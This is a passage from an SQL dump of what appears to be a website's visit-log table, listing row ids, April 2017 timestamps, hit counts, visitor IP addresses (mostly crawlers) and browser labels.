,0,0,'51.255.65.7','other'),(104769,1493449469,1,1,0,0,'40.77.167.77','other'),(104770,1493449873,1,1,0,0,'176.195.113.111','msie'),(104771,1493450358,1,1,0,0,'217.69.133.228','other'),(104772,1493450535,1,1,0,0,'188.32.79.137','msie'),(104773,1493450766,1,1,0,0,'217.182.132.18','other'),(104774,1493450996,1,1,0,0,'217.182.132.173','other'),(104775,1493451560,1,1,0,0,'51.255.71.100','other'),(104776,1493451578,1,1,0,0,'217.182.132.7','other'),(104777,1493451891,1,1,0,0,'8.29.198.25','other'),(104778,1493451996,1,1,0,0,'51.255.65.46','other'),(104779,1493452078,1,1,0,0,'164.132.161.34','other'),(104780,1493452349,1,1,0,0,'51.255.65.40','other'),(104781,1493452789,1,1,0,0,'51.255.65.17','other'),(104782,1493452894,1,1,0,0,'164.132.161.97','other'),(104783,1493452975,1,1,0,0,'164.132.161.47','other'),(104784,1493453173,1,1,0,0,'217.182.132.96','other'),(104785,1493453772,1,1,0,0,'51.255.65.92','other'),(104786,1493453794,1,1,0,0,'217.69.133.234','other'),(104787,1493454554,1,1,0,0,'217.69.133.15','other'),(104788,1493454697,1,1,0,0,'51.255.71.112','other'),(104789,1493454864,1,1,0,0,'5.255.253.63','other'),(104790,1493454920,1,1,0,0,'141.8.184.107','other'),(104791,1493456200,2,2,0,0,'162.210.196.130','other'),(104792,1493457182,1,0,1,0,'66.249.76.29',''),(104793,1493457260,1,1,0,0,'91.196.178.133','other'),(104794,1493457335,1,1,0,0,'51.255.65.52','other'),(104795,1493457507,1,1,0,0,'51.255.65.70','other'),(104796,1493457833,1,1,0,0,'216.244.66.246','other'),(104797,1493457842,1,1,0,0,'217.182.132.153','other'),(104798,1493457876,1,1,0,0,'217.69.133.9','other'),(104799,1493458393,1,1,0,0,'51.255.65.21','other'),(104800,1493458638,1,1,0,0,'217.182.132.27','other'),(104801,1493459093,1,1,0,0,'164.132.161.92','other'),(104802,1493459590,1,1,0,0,'217.182.132.57','other'),(104803,1493459618,1,1,0,0,'164.132.161.56','other'),(104804,1493460038,1,1,0,0,'164.132.161.88','other'),(104806,1493460251,1,1,0,0,'51.255.65.41','other'),(104807,1493460898,1,1,0,0,'137.74.207.161','other'),(104808,1493460994,1,1,0,0,'54.165.59.7','other'),(104809,1493461123,1,1,0,0,'217.69.133.225','other'),(104810,1493462181,1,1,0,0,'217.182.132.56','other'),(104811,1493462733,1,1,0,0,'8.29.198.27','other'),(104812,1493463349,1,1,0,0,'216.244.66.246','other'),(104813,1493463350,1,1,0,0,'217.182.132.29','other'),(104814,1493463887,1,1,0,0,'157.55.39.247','other'),(104815,1493464128,1,1,0,0,'217.182.132.51','other'),(104816,1493464170,1,1,0,0,'51.255.65.92','other'),(104817,1493464237,1,1,0,0,'54.165.59.7','other'),(104818,1493464532,1,1,0,0,'164.132.161.64','other'),(104819,1493466295,1,1,0,0,'217.182.132.54','other'),(104820,1493466402,1,1,0,0,'180.76.15.18','other'),(104821,1493467213,1,0,1,0,'66.249.66.180',''),(104822,1493467433,1,0,1,0,'68.180.228.49',''),(104823,1493467789,1,1,0,0,'51.255.65.75','other'),(104824,1493467986,3,3,0,0,'216.244.66.246','other'),(104825,1493468284,1,1,0,0,'91.196.178.167','chrome'),(104826,1493468657,1,1,0,0,'137.74.207.109','other'),(104827,1493469080,1,1,0,0,'164.132.161.81','other'),(104828,1493469370,1,1,0,0,'217.69.133.238','other'),(104829,1493469797,1,1,0,0,'217.69.133.219','other'),(104830,1493469827,1,1,0,0,'51.255.65.39','other'),(104831,1493469966,1,1,0,0,'51.255.65.26','other'),(104832,1493470843,1,1,0,0,'51.255.71.101','other'),(104833,1493470965,1,1,0,0,'164.132.161.33','other'),(104834,1493471064,1,1,0,0,'217.69.136.207','other'),(104835,1493471120,1,1,0,0,'217.182.132.148','other'),(104836,1493471225,1,1,0,0,'217.182.132.151','other'),(104837,1493471386,1,1,0,0,'137.74.207.114','other'),(104838,1493471734,1,1,0,0,'217.69.133.218','other'),(104839,1493471810,1,1,0,0,'216.244.66.237','other'),(104840,1493471872,1,1,0,0,'217.69.133.242','other'),(104841,1493472113,1,1,0,0,'91.196.178.167','chrome'),(104842,1493472130,1,1,0,0,'199.16.157.180','other'),(104843,1493472131,1,1,0,0,'17.142.154.134','other'),(104844,1493472132,1,0,1,0,'72.30.14.91',''),(104845,1493472147,1,1,0,0,'144.76.22.19','firefox'),(104846,1493472200,1,1,0,0,'23.96.208.137','msie'),(104847,1493472201,1,1,0,0,'51.255.66.104','other'),(104848,1493472231,2,2,0,0,'136.243.154.100','other'),(104849,1493472605,1,1,0,0,'164.132.161.20','other'),(104850,1493472704,1,0,1,0,'66.249.76.109',''),(104851,1493472813,1,1,0,0,'51.255.71.128','other'),(104852,1493473105,4,4,0,0,'216.244.66.246','other'),(104853,1493473118,1,1,0,0,'51.255.71.114','other'),(104854,1493473408,1,1,0,0,'217.69.133.226','other'),(104855,1493473533,1,1,0,0,'137.74.207.108','other'),(104856,1493473548,1,1,0,0,'51.255.65.3','other'),(104857,1493473566,1,1,0,0,'8.29.198.25','other'),(104858,1493474836,1,1,0,0,'217.69.133.4','other'),(104859,1493474988,1,1,0,0,'217.182.132.151','other'),(104860,1493475144,1,0,1,0,'66.249.76.109',''),(104861,1493475732,1,1,0,0,'164.132.161.88','other'),(104862,1493475768,1,0,1,0,'72.30.14.91',''),(104863,1493476396,1,0,1,0,'66.249.66.177',''),(104864,1493476518,1,1,0,0,'164.132.161.96','other'),(104865,1493476580,1,1,0,0,'217.182.132.85','other'),(104866,1493476757,1,1,0,0,'217.182.132.184','other'),(104867,1493477406,1,1,0,0,'164.132.161.59','other'),(104868,1493477456,1,1,0,0,'51.255.65.45','other'),(104869,1493477461,1,1,0,0,'217.69.133.243','other'),(104870,1493477679,1,1,0,0,'216.244.66.237','other'),(104871,1493478310,1,1,0,0,'51.255.65.26','other'),(104872,1493478532,1,1,0,0,'51.255.71.128','other'),(104873,1493479187,1,1,0,0,'217.182.132.68','other'),(104874,1493479404,1,1,0,0,'51.255.65.44','other'),(104875,1493479783,1,1,0,0,'217.69.133.231','other'),(104876,1493480427,1,1,0,0,'217.182.132.21','other'),(104877,1493481298,1,1,0,0,'164.132.161.84','other'),(104878,1493481384,1,0,1,0,'66.249.66.84',''),(104879,1493481529,1,1,0,0,'164.132.161.17','other'),(104880,1493481992,1,1,0,0,'164.132.161.75','other'),(104881,1493482135,1,1,0,0,'217.69.133.249','other'),(104882,1493482224,1,1,0,0,'217.182.132.148','other'),(104883,1493482250,1,0,1,0,'66.249.76.107',''),(104884,1493482373,1,0,1,0,'66.249.76.108',''),(104885,1493482394,1,0,1,0,'66.249.66.177',''),(104886,1493482424,1,1,0,0,'217.69.133.67','other'),(104887,1493482574,1,1,0,0,'51.255.65.71','other'),(104888,1493483015,1,1,0,0,'164.132.162.156','other'),(104889,1493483745,1,1,0,0,'164.132.161.14','other'),(104890,1493483950,1,1,0,0,'217.69.133.9','other'),(104891,1493484161,1,1,0,0,'164.132.161.79','other'),(104892,1493484234,1,1,0,0,'51.255.65.24','other'),(104893,1493484398,1,1,0,0,'8.29.198.25','other'),(104894,1493484684,1,1,0,0,'164.132.162.154','other'),(104895,1493484838,1,1,0,0,'217.69.133.238','other'),(104896,1493485472,1,1,0,0,'91.209.11.236','other'),(104897,1493485561,1,1,0,0,'164.132.161.18','other'),(104898,1493485659,1,1,0,0,'51.255.71.113','other'),(104899,1493485802,1,1,0,0,'137.74.207.116','other'),(104900,1493486035,1,1,0,0,'164.132.161.34','other'),(104901,1493486121,1,0,1,0,'66.249.76.109',''),(104902,1493487083,1,1,0,0,'217.182.132.53','other'),(104903,1493487182,1,1,0,0,'94.178.7.56','chrome'),(104904,1493487557,1,1,0,0,'51.255.71.130','other'),(104905,1493487646,1,1,0,0,'217.69.133.11','other'),(104906,1493487727,1,1,0,0,'51.255.65.27','other'),(104907,1493487737,1,1,0,0,'137.74.207.110','other'),(104908,1493488338,1,1,0,0,'164.132.161.12','other'),(104909,1493488495,1,1,0,0,'51.255.65.55','other'),(104910,1493488653,1,1,0,0,'51.255.65.12','other'),(104911,1493488777,1,1,0,0,'51.255.65.77','other'),(104912,1493488892,1,1,0,0,'51.255.65.72','other'),(104913,1493489123,1,1,0,0,'51.255.65.20','other'),(104914,1493489347,1,0,1,0,'66.249.76.107',''),(104915,1493489363,1,1,0,0,'164.132.162.160','other'),(104916,1493489364,3,3,0,0,'54.165.59.7','other'),(104917,1493489550,1,1,0,0,'216.244.66.246','other'),(104918,1493489798,1,1,0,0,'51.255.65.27','other'),(104919,1493489802,1,1,0,0,'164.132.161.91','other'),(104920,1493489808,1,0,1,0,'66.249.76.28',''),(104921,1493490594,1,1,0,0,'51.255.65.65','other'),(104922,1493490764,1,1,0,0,'217.69.133.4','other'),(104923,1493490825,1,1,0,0,'164.132.161.63','other'),(104924,1493490863,1,1,0,0,'51.255.65.8','other'),(104925,1493491072,1,1,0,0,'217.69.133.68','other'),(104926,1493491240,1,1,0,0,'217.182.132.18','other'),(104927,1493491332,1,1,0,0,'51.255.65.20','other'),(104928,1493491409,1,1,0,0,'217.69.133.67','other'),(104929,1493491555,1,0,1,0,'66.249.66.177',''),(104930,1493491712,1,1,0,0,'51.255.65.12','other'),(104931,1493491770,1,1,0,0,'164.132.161.76','other'),(104932,1493491777,1,1,0,0,'164.132.162.187','other'),(104933,1493492267,1,1,0,0,'164.132.161.41','other'),(104934,1493492525,1,1,0,0,'164.132.161.63','other'),(104935,1493492798,1,1,0,0,'217.182.132.84','other'),(104936,1493493228,1,1,0,0,'51.255.65.47','other'),(104937,1493493240,1,1,0,0,'217.69.136.206','other'),(104938,1493493548,2,2,0,0,'173.212.212.57','other'),(104939,1493493727,1,1,0,0,'217.69.133.70','other'),(104940,1493494538,1,1,0,0,'164.132.161.59','other'),(104941,1493494804,1,1,0,0,'54.165.59.7','other'),(104942,1493494878,1,1,0,0,'164.132.161.90','other'),(104943,1493494880,1,1,0,0,'217.69.133.12','other'),(104944,1493494992,1,1,0,0,'164.132.161.50','other'),(104945,1493495221,1,1,0,0,'8.29.198.27','other'),(104946,1493495518,1,1,0,0,'109.173.56.152','msie'),(104947,1493496512,1,1,0,0,'51.255.65.67','other'),(104948,1493497151,1,1,0,0,'164.132.161.30','other'),(104949,1493497714,1,1,0,0,'164.132.161.58','other'),(104950,1493497827,1,1,0,0,'217.182.132.90','other'),(104951,1493498463,1,1,0,0,'216.244.66.237','other'),(104952,1493498535,1,0,1,0,'68.180.228.49',''),(104953,1493498638,1,1,0,0,'217.182.132.68','other'),(104954,1493498722,1,1,0,0,'51.255.71.113','other'),(104955,1493498998,1,1,0,0,'141.8.142.164','other'),(104956,1493500341,1,1,0,0,'51.255.65.5','other'),(104957,1493500362,1,1,0,0,'164.132.162.157','other'),(104958,1493500638,1,1,0,0,'164.132.161.41','other'),(104959,1493500690,1,1,0,0,'164.132.161.40','other'),(104960,1493500891,1,1,0,0,'216.244.66.237','other'),(104961,1493501600,1,1,0,0,'180.76.15.156','other'),(104962,1493501976,1,1,0,0,'217.182.132.19','other'),(104963,1493502085,1,1,0,0,'51.255.65.3','other'),(104964,1493502176,1,1,0,0,'164.132.161.15','other'),(104965,1493502496,1,1,0,0,'164.132.161.84','other'),(104966,1493502845,1,1,0,0,'164.132.161.53','other'),(104967,1493503033,1,1,0,0,'40.77.167.76','other'),(104968,1493503145,1,1,0,0,'217.69.133.29','other'),(104969,1493503443,1,0,1,0,'66.249.76.27',''),(104970,1493503660,1,1,0,0,'164.132.161.85','other'),(104971,1493504038,1,1,0,0,'217.182.132.95','other'),(104972,1493504069,1,1,0,0,'217.182.132.27','other'),(104973,1493504864,1,1,0,0,'217.182.132.148','other'),(104974,1493504927,1,1,0,0,'217.182.132.84','other'),(104975,1493505868,1,1,0,0,'54.165.59.7','other'),(104976,1493505942,1,1,0,0,'164.132.161.60','other'),(104977,1493506046,1,1,0,0,'8.29.198.27','other'),(104978,1493506707,1,1,0,0,'217.182.132.22','other'),(104979,1493506966,1,1,0,0,'51.255.65.39','other'),(104980,1493507608,1,1,0,0,'178.154.200.37','other'),(104981,1493507737,1,1,0,0,'51.255.71.113','other'),(104982,1493508006,1,1,0,0,'176.195.125.216','msie'),(104983,1493508448,1,1,0,0,'40.77.167.76','other'),(104984,1493508803,1,1,0,0,'37.204.152.138','msie'),(104985,1493509115,1,1,0,0,'217.182.132.153','other'),(104986,1493509481,1,1,0,0,'46.242.65.100','msie'),(104987,1493509536,1,1,0,0,'164.132.161.41','other'),(104988,1493509819,1,1,0,0,'46.188.40.119','msie'),(104989,1493510114,1,1,0,0,'66.249.76.27','chrome'),(104990,1493510339,1,1,0,0,'217.182.132.174','other'),(104991,1493511043,1,1,0,0,'217.182.132.188','other'),(104992,1493512081,1,1,0,0,'66.249.66.87','chrome'),(104993,1493512105,1,1,0,0,'217.182.132.15','other'),(104994,1493512198,1,0,1,0,'66.249.66.180',''),(104995,1493512482,1,1,0,0,'164.132.161.34','other'),(104996,1493512527,1,1,0,0,'51.255.65.95','other'),(104997,1493512548,1,1,0,0,'217.69.133.194','other'),(104998,1493512691,1,1,0,0,'217.182.132.92','other'),(104999,1493512737,1,1,0,0,'164.132.162.187','other'),(105000,1493513055,1,1,0,0,'51.255.65.80','other'),(105001,1493513508,1,1,0,0,'51.255.65.3','other'),(105002,1493513631,1,1,0,0,'164.132.161.36','other'),(105003,1493513899,1,1,0,0,'51.255.65.7','other'),(105004,1493514400,1,1,0,0,'217.182.132.66','other'),(105005,1493515483,1,1,0,0,'217.69.133.234','other'),(105006,1493516225,2,2,0,0,'216.244.66.237','other'),(105007,1493516301,1,1,0,0,'217.182.132.84','other'),(105008,1493516408,6,6,0,0,'46.229.168.69','other'),(105009,1493516417,7,7,0,0,'46.229.168.74','other'),(105010,1493516430,2,2,0,0,'46.229.168.73','other'),(105011,1493516444,6,6,0,0,'46.229.168.68','other'),(105012,1493516480,5,5,0,0,'46.229.168.70','other'),(105013,1493516484,3,3,0,0,'46.229.168.75','other'),(105014,1493516496,3,3,0,0,'46.229.168.71','other'),(105015,1493516502,1,1,0,0,'141.8.142.154','other'),(105016,1493516534,4,4,0,0,'46.229.168.66','other'),(105017,1493516580,2,2,0,0,'46.229.168.72','other'),(105018,1493516615,1,1,0,0,'46.229.168.65','other'),(105019,1493516668,1,1,0,0,'46.229.168.67','other'),(105020,1493516876,1,1,0,0,'8.29.198.27','other'),(105021,1493517439,1,1,0,0,'164.132.161.76','other'),(105022,1493517456,1,1,0,0,'217.182.132.77','other'),(105023,1493517846,1,1,0,0,'51.255.65.67','other'),(105024,1493518664,1,1,0,0,'217.182.132.171','other'),(105025,1493519583,1,0,1,0,'66.249.76.27',''),(105026,1493520343,1,1,0,0,'217.182.132.78','other'),(105027,1493520506,1,1,0,0,'51.255.65.48','other'),(105028,1493521088,1,1,0,0,'217.69.133.247','other'),(105029,1493521669,1,1,0,0,'137.74.207.119','other'),(105030,1493522041,1,1,0,0,'217.182.132.18','other'),(105031,1493522494,1,1,0,0,'217.182.132.171','other'),(105032,1493523035,1,1,0,0,'51.255.65.66','other'),(105033,1493523138,1,1,0,0,'217.182.132.69','other'),(105034,1493523230,1,1,0,0,'137.74.207.164','other'),(105035,1493523831,1,0,1,0,'66.249.76.27',''),(105036,1493524258,1,1,0,0,'217.182.132.187','other'),(105037,1493524263,1,1,0,0,'51.255.71.133','other'),(105038,1493524473,1,1,0,0,'217.182.132.54','other'),(105039,1493524847,1,1,0,0,'217.182.132.60','other'),(105040,1493526165,1,1,0,0,'217.182.132.184','other'),(105041,1493526715,1,0,1,0,'66.249.76.109',''),(105042,1493527162,1,1,0,0,'164.132.161.64','other'),(105043,1493527661,1,1,0,0,'51.255.71.110','other'),(105044,1493527705,1,1,0,0,'8.29.198.27','other'),(105045,1493528975,1,1,0,0,'137.74.207.188','other'),(105046,1493529057,1,0,1,0,'66.249.66.177',''),(105047,1493529651,1,1,0,0,'164.132.161.31','other'),(105048,1493529819,1,1,0,0,'51.255.65.17','other'),(105049,1493530132,1,1,0,0,'137.74.207.164','other'),(105050,1493530780,1,1,0,0,'164.132.161.67','other'),(105051,1493531499,1,0,1,0,'66.249.66.180',''),(105052,1493531524,1,0,1,0,'66.249.66.177',''),(105053,1493531789,1,1,0,0,'164.132.161.73','other'),(105054,1493532827,1,1,0,0,'164.132.161.17','other'),(105055,1493532919,1,1,0,0,'66.102.9.27','chrome'),(105056,1493533334,1,1,0,0,'95.108.179.15','other'),(105057,1493533484,1,1,0,0,'51.255.65.36','other'),(105058,1493533772,2,2,0,0,'216.244.66.237','other'),(105059,1493534192,1,1,0,0,'66.249.66.180','chrome'),(105060,1493534401,1,0,1,0,'66.249.76.28',''),(105061,1493534409,1,1,0,0,'164.132.161.91','other'),(105062,1493534560,1,0,1,0,'66.249.76.108',''),(105063,1493534900,1,1,0,0,'51.255.65.22','other'),(105064,1493535153,1,1,0,0,'217.182.132.66','other'),(105065,1493535798,1,1,0,0,'66.249.66.183','chrome'),(105066,1493536332,1,1,0,0,'217.182.132.86','other'),(105067,1493536407,1,1,0,0,'66.249.76.27','chrome'),(105068,1493536490,1,1,0,0,'51.255.71.100','other'),(105069,1493536609,1,1,0,0,'217.182.132.183','other'),(105070,1493536789,1,1,0,0,'217.182.132.148','other'),(105071,1493537413,1,1,0,0,'51.255.65.44','other'),(105072,1493537542,1,1,0,0,'217.182.132.85','other'),(105073,1493537672,1,1,0,0,'51.255.65.26','other'),(105074,1493537674,1,1,0,0,'217.182.132.81','other'),(105075,1493537709,1,0,1,0,'66.249.76.29',''),(105076,1493537807,1,0,1,0,'68.180.228.49',''),(105077,1493538336,1,1,0,0,'217.182.132.52','other'),(105078,1493538355,1,1,0,0,'164.132.162.156','other'),(105079,1493538531,1,1,0,0,'8.29.198.27','other'),(105080,1493538942,1,1,0,0,'51.255.65.38','other'),(105081,1493538969,1,1,0,0,'13.68.212.103','firefox'),(105082,1493539173,1,1,0,0,'217.182.132.58','other'),(105083,1493540051,1,1,0,0,'164.132.161.27','other'),(105084,1493540358,1,1,0,0,'51.255.71.122','other'),(105085,1493540629,1,1,0,0,'217.182.132.87','other'),(105086,1493540715,1,1,0,0,'51.255.65.85','other'),(105087,1493540742,1,1,0,0,'217.69.133.3','other'),(105088,1493541219,1,1,0,0,'217.182.132.179','other'),(105089,1493541554,1,1,0,0,'216.244.66.237','other'),(105090,1493541623,1,1,0,0,'164.132.161.92','other'),(105091,1493541643,1,1,0,0,'217.182.132.152','other'),(105092,1493541776,1,1,0,0,'217.182.132.240','other'),(105093,1493542006,1,1,0,0,'164.132.161.50','other'),(105094,1493542147,2,2,0,0,'40.77.167.87','other'),(105095,1493543032,1,1,0,0,'40.77.167.17','other'),(105096,1493543298,1,1,0,0,'164.132.161.23','other'),(105097,1493543506,1,1,0,0,'217.182.132.52','other'),(105098,1493543617,1,1,0,0,'66.249.76.107','chrome'),(105099,1493543621,6,6,0,0,'62.210.251.247','other'),(105100,1493543679,1,1,0,0,'51.255.65.83','other'),(105101,1493543930,1,1,0,0,'217.182.132.71','other'),(105102,1493544340,1,1,0,0,'164.132.161.69','other'),(105103,1493544595,1,1,0,0,'51.255.65.71','other'),(105104,1493544871,1,1,0,0,'51.255.65.50','other'),(105105,1493545415,1,1,0,0,'216.244.66.237','other'),(105106,1493545862,1,1,0,0,'95.108.213.34','other'),(105107,1493545874,1,1,0,0,'141.8.142.154','other'),(105108,1493546177,1,1,0,0,'217.182.132.185','other'),(105109,1493546676,1,1,0,0,'164.132.161.57','other'),(105110,1493546796,1,1,0,0,'217.182.132.174','other'),(105111,1493546865,1,1,0,0,'164.132.161.51','other'),(105112,1493547006,1,1,0,0,'51.255.65.62','other'),(105113,1493547022,1,1,0,0,'178.210.131.138','chrome'),(105114,1493547133,1,0,1,0,'66.249.76.27',''),(105115,1493547169,1,1,0,0,'164.132.161.45','other'),(105116,1493547227,1,1,0,0,'51.255.65.31','other'),(105117,1493547306,1,1,0,0,'66.249.76.27','chrome'),(105118,1493547421,1,1,0,0,'217.182.132.173','other'),(105119,1493547884,1,0,1,0,'66.249.76.29',''),(105120,1493547978,1,1,0,0,'217.182.132.84','other'),(105121,1493548324,1,1,0,0,'180.76.15.157','other'),(105122,1493548388,1,1,0,0,'66.249.76.29','chrome'),(105123,1493549029,1,0,1,0,'66.249.76.108',''),(105124,1493549342,1,1,0,0,'217.69.133.251','other'),(105125,1493549360,1,1,0,0,'8.29.198.26','other'),(105126,1493549365,1,1,0,0,'164.132.161.74','other'),(105127,1493550217,1,1,0,0,'164.132.161.45','other'),(105128,1493550319,1,1,0,0,'37.54.133.66','chrome'),(105129,1493550431,1,1,0,0,'217.182.132.57','other'),(105130,1493550441,1,1,0,0,'217.182.132.27','other'),(105131,1493550537,1,1,0,0,'40.77.167.89','other'),(105132,1493550869,1,1,0,0,'141.8.142.154','other'),(105133,1493550872,1,1,0,0,'5.255.253.63','other'),(105134,1493550955,1,1,0,0,'51.255.65.64','other'),(105135,1493551308,1,1,0,0,'51.255.65.13','other'),(105136,1493551347,1,1,0,0,'51.255.65.8','other'),(105137,1493551545,1,1,0,0,'66.249.76.107','chrome'),(105138,1493551998,1,1,0,0,'51.255.65.19','other'),(105139,1493552097,1,1,0,0,'217.69.133.9','other'),(105140,1493552460,1,1,0,0,'91.196.178.163','chrome'),(105141,1493552753,1,1,0,0,'141.8.142.15','other'),(105142,1493553145,1,1,0,0,'51.255.65.81','other'),(105143,1493553332,1,1,0,0,'46.133.204.82','chrome'),(105144,1493553738,1,1,0,0,'66.249.76.27','chrome'),(105145,1493553922,1,1,0,0,'51.255.65.30','other'),(105146,1493554163,1,1,0,0,'164.132.161.23','other'),(105147,1493554239,1,1,0,0,'95.108.179.15','other'),(105148,1493554937,1,1,0,0,'51.255.65.67','other'),(105149,1493554971,1,1,0,0,'5.165.245.243','msie'),(105150,1493555146,1,0,1,0,'66.249.66.177',''),(105151,1493555162,1,1,0,0,'46.165.197.141','other'),(105152,1493555783,1,1,0,0,'216.244.66.237','other'),(105153,1493555952,1,1,0,0,'109.63.190.74','msie'),(105154,1493556042,1,1,0,0,'217.182.132.183','other'),(105155,1493556239,1,1,0,0,'180.76.15.163','other'),(105156,1493556396,1,1,0,0,'51.255.65.48','other'),(105157,1493557443,1,1,0,0,'46.242.65.100','msie'),(105158,1493557529,1,1,0,0,'37.204.154.238','msie'),(105159,1493557669,1,1,0,0,'217.182.132.91','other'),(105160,1493557781,1,1,0,0,'217.182.132.170','other'),(105161,1493558400,1,1,0,0,'217.182.132.75','other'),(105162,1493559143,1,1,0,0,'51.255.71.121','other'),(105163,1493559916,1,1,0,0,'164.132.161.73','other'),(105164,1493559962,1,1,0,0,'164.132.161.76','other'),(105165,1493560184,1,1,0,0,'8.29.198.27','other'),(105166,1493560426,1,1,0,0,'217.69.133.251','other'),(105167,1493560428,1,1,0,0,'217.69.133.253','other'),(105168,1493560438,1,1,0,0,'164.132.161.37','other'),(105169,1493560582,1,1,0,0,'164.132.161.84','other'),(105170,1493560701,1,1,0,0,'164.132.161.56','other'),(105171,1493560827,1,1,0,0,'176.120.97.66','chrome'),(105172,1493561327,1,1,0,0,'91.209.11.236','other'),(105173,1493561570,1,1,0,0,'217.182.132.185','other'),(105174,1493561755,1,1,0,0,'216.244.66.237','other'),(105175,1493561828,1,1,0,0,'5.58.34.201','chrome'),(105176,1493562210,1,1,0,0,'62.212.73.211','other'),(105177,1493562345,1,1,0,0,'66.249.76.29','chrome'),(105178,1493562477,1,1,0,0,'217.182.132.15','other'),(105179,1493562554,1,1,0,0,'51.255.65.21','other'),(105180,1493562891,1,1,0,0,'137.74.203.194','other'),(105181,1493563472,1,1,0,0,'51.255.65.42','other'),(105182,1493563841,1,1,0,0,'54.165.59.7','other'),(105183,1493564047,1,1,0,0,'217.182.132.67','other'),(105184,1493564411,1,1,0,0,'51.255.65.46','other'),(105185,1493564890,1,1,0,0,'164.132.161.26','other'),(105186,1493565559,1,1,0,0,'217.182.132.148','other'),(105187,1493565593,1,1,0,0,'194.187.170.101','other'),(105188,1493565814,1,1,0,0,'178.154.200.37','other'),(105189,1493566032,1,1,0,0,'164.132.161.54','other'),(105190,1493566679,1,1,0,0,'180.76.15.12','other'),(105191,1493566831,1,1,0,0,'164.132.161.9','other'),(105192,1493566864,1,1,0,0,'217.182.132.78','other'),(105193,1493567345,1,1,0,0,'66.249.66.28','chrome'),(105194,1493567527,1,0,1,0,'66.249.76.28',''),(105195,1493567974,1,1,0,0,'141.8.132.25','other'),(105196,1493568388,1,1,0,0,'40.77.167.17','other'),(105197,1493569440,1,1,0,0,'164.132.164.180','other'),(105198,1493570259,1,0,1,0,'66.249.66.84',''),(105199,1493570314,1,1,0,0,'217.182.132.188','other'),(105200,1493570473,1,1,0,0,'164.132.161.88','other'),(105201,1493570606,1,0,1,0,'66.249.76.28',''),(105202,1493571010,1,1,0,0,'8.29.198.26','other'),(105203,1493572338,1,0,1,0,'68.180.231.24',''),(105204,1493572709,1,1,0,0,'40.77.167.89','other'),(105205,1493573002,1,1,0,0,'51.255.65.58','other'),(105206,1493573474,1,1,0,0,'217.69.133.23','other'),(105207,1493573621,1,1,0,0,'164.132.161.8','other'),(105208,1493573854,1,1,0,0,'51.255.65.3','other'),(105209,1493573985,1,1,0,0,'51.255.65.57','other'),(105210,1493574125,1,1,0,0,'51.255.65.26','other'),(105211,1493574267,1,1,0,0,'137.74.207.114','other'),(105212,1493574284,1,1,0,0,'217.182.132.184','other'),(105213,1493574403,1,1,0,0,'91.196.178.104','chrome'),(105214,1493575346,1,0,1,0,'66.249.76.108',''),(105215,1493575495,1,1,0,0,'180.76.15.22','other'),(105216,1493575537,1,1,0,0,'51.255.71.127','other'),(105217,1493575758,1,1,0,0,'217.182.132.36','other'),(105218,1493575961,1,1,0,0,'51.255.65.25','other'),(105219,1493576095,1,1,0,0,'217.69.133.11','other'),(105220,1493576207,1,1,0,0,'217.69.133.9','other'),(105221,1493576351,2,0,2,0,'66.249.76.107',''),(105222,1493576623,1,1,0,0,'164.132.161.64','other'),(105223,1493577440,1,1,0,0,'66.249.76.107','chrome'),(105224,1493577476,1,0,1,0,'66.249.76.27',''),(105225,1493577945,1,1,0,0,'217.182.132.57','other'),(105226,1493577987,1,0,1,0,'68.180.228.49',''),(105227,1493578096,1,1,0,0,'51.255.65.31','other'),(105228,1493578408,1,1,0,0,'217.182.132.93','other'),(105229,1493578425,1,1,0,0,'51.255.65.97','other'),(105230,1493578458,1,0,1,0,'66.249.76.28',''),(105231,1493579189,1,1,0,0,'217.182.132.155','other'),(105232,1493579316,1,1,0,0,'51.255.71.116','other'),(105233,1493579602,1,1,0,0,'217.182.132.150','other'),(105234,1493580669,1,1,0,0,'137.74.207.108','other'),(105235,1493581538,1,1,0,0,'217.182.132.75','other'),(105236,1493581838,1,1,0,0,'8.29.198.27','other'),(105237,1493582006,3,3,0,0,'216.244.66.237','other'),(105238,1493583610,1,1,0,0,'46.211.123.95','chrome'),(105239,1493583611,1,1,0,0,'95.108.141.76','chrome'),(105240,1493583624,1,1,0,0,'95.108.213.34','other'),(105241,1493583709,1,1,0,0,'66.249.66.22','chrome'),(105242,1493585155,1,1,0,0,'217.69.133.241','other'),(105243,1493585201,1,1,0,0,'40.77.167.17','other'),(105244,1493585426,1,1,0,0,'51.255.65.79','other'),(105245,1493585655,1,1,0,0,'51.255.71.101','other'),(105246,1493586043,1,0,1,0,'66.249.76.27',''),(105247,1493586577,1,1,0,0,'164.132.162.155','other'),(105248,1493586623,1,1,0,0,'51.255.71.113','other'),(105249,1493587417,1,1,0,0,'137.74.201.108','other'),(105250,1493588167,2,0,2,0,'66.249.76.108',''),(105251,1493588180,1,1,0,0,'217.182.132.74','other'),(105252,1493588476,1,0,1,0,'66.249.66.28',''),(105253,1493588584,1,1,0,0,'137.74.207.159','other'),(105254,1493588615,1,1,0,0,'40.77.167.89','other'),(105255,1493588863,1,1,0,0,'51.255.65.40','other'),(105256,1493589431,1,1,0,0,'217.182.132.153','other'),(105257,1493590924,1,1,0,0,'46.211.130.122','chrome'),(105258,1493591235,1,0,1,0,'66.249.66.81',''),(105259,1493592685,1,1,0,0,'8.29.198.25','other'),(105260,1493592985,1,1,0,0,'164.132.161.38','other'),(105261,1493593069,1,1,0,0,'217.182.132.181','other'),(105262,1493593489,1,1,0,0,'5.228.8.57','msie'),(105263,1493594617,1,0,1,0,'66.249.66.25',''),(105264,1493594856,1,1,0,0,'51.255.71.133','other'),(105265,1493594966,1,1,0,0,'217.182.132.80','other'),(105266,1493595000,1,1,0,0,'137.74.201.100','other'),(105267,1493595251,1,1,0,0,'137.74.207.109','other'),(105268,1493596398,1,1,0,0,'176.195.116.45','msie'),(105269,1493596564,13,13,0,0,'95.108.213.34','other'),(105270,1493597176,2,2,0,0,'95.213.141.126','opera'),(105271,1493597602,1,1,0,0,'137.74.207.116','other'),(105272,1493597756,1,1,0,0,'217.182.132.191','other'),(105273,1493597869,1,1,0,0,'217.69.133.243','other'),(105274,1493597971,1,1,0,0,'164.132.162.155','other'),(105275,1493598048,1,1,0,0,'217.182.132.180','other'),(105276,1493598089,3,3,0,0,'95.108.213.34','other'),(105277,1493598961,1,1,0,0,'51.255.65.82','other'),(105278,1493599499,1,1,0,0,'164.132.161.10','other'),(105279,1493600360,1,1,0,0,'93.158.152.77','other'),(105280,1493600362,1,1,0,0,'178.154.189.29','other'),(105281,1493600377,1,1,0,0,'178.154.149.1','other'),(105282,1493601084,1,1,0,0,'216.244.66.237','other'),(105283,1493601562,1,1,0,0,'109.63.199.164','msie'),(105284,1493601729,1,1,0,0,'141.8.132.72','other'),(105285,1493602019,1,1,0,0,'217